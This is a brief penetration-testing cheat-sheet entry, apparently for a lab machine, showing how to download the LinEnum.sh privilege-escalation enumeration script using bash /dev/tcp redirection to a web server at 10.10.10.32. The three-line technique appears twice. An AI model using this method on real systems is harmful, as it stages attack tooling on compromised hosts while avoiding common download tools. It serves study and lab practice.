Bash Download
Connect to the webserver:
exec 3<>/dev/tcp/10.10.10.32/80We send a GET request:
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3To print the response:
cat <&3Last updated
Connect to the webserver:
exec 3<>/dev/tcp/10.10.10.32/80We send a GET request:
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3To print the response:
cat <&3Last updated